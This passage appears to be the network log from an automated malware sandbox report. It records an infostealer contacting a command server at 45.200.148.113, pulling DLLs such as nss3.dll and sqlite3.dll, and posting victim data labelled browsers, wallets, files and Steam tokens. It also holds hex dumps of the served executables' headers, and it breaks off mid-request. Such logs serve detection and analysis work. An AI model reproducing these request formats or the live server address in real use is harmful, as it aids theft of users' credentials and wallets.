00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:17 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:18 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.200.148.113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 45.200.148.113Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 39 34 39 41 30 39 45 34 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 41 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="hwid"DB949A09E4122040409402------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build"A1------GHJDBAKEHDHDGCAKKJJE--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGHHost: 45.200.148.113Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 2d 2d 0d 0a Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="message"browsers------IIIDAKJDHJKFHIEBFCGH--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 45.200.148.113Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="message"plugins------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: 45.200.148.113Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 2d 2d 0d 0a Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="message"fplugins------FCFBAKJDBKJJKFIDBGHC--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 45.200.148.113Content-Length: 6627Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/sqlite3.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 45.200.148.113Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 45.200.148.113Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDBHost: 45.200.148.113Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 2d 2d 0d 0a Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="file"------DAEGIIECGHCBFHJKEHDB--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 45.200.148.113Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file"------IDBKKKKKFBGDGDHIDBGH--
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/freebl3.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/mozglue.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/msvcp140.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/nss3.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/softokn3.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2a5dc88bed850cdd/vcruntime140.dll HTTP/1.1Host: 45.200.148.113Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 45.200.148.113Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 45.200.148.113Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="message"wallets------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCBHost: 45.200.148.113Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"85d749afffed07750d62cf58cb48dd07c29fb2dd52994ab4c0bbf3a8cf85b479c88ad310------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"files------GHCGDAFCFHIDBGDHCFCB--
Source: global traffic HTTP traffic detected: POST /0a616124ff2f2b69.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 45.200.148.113Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 64 37 34 39 61 66 66 66 65 64 30 37 37 35 30 64 36 32 63 66 35 38 63 62 34 38 64 64 30 37 63 32 39 66 62 32 64 64 35 32 39 39 34 61 62 34 63 30 62 62 66 33 61 38 63 66 38 35 62 34 37 39 63 38 38 61 64 33 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 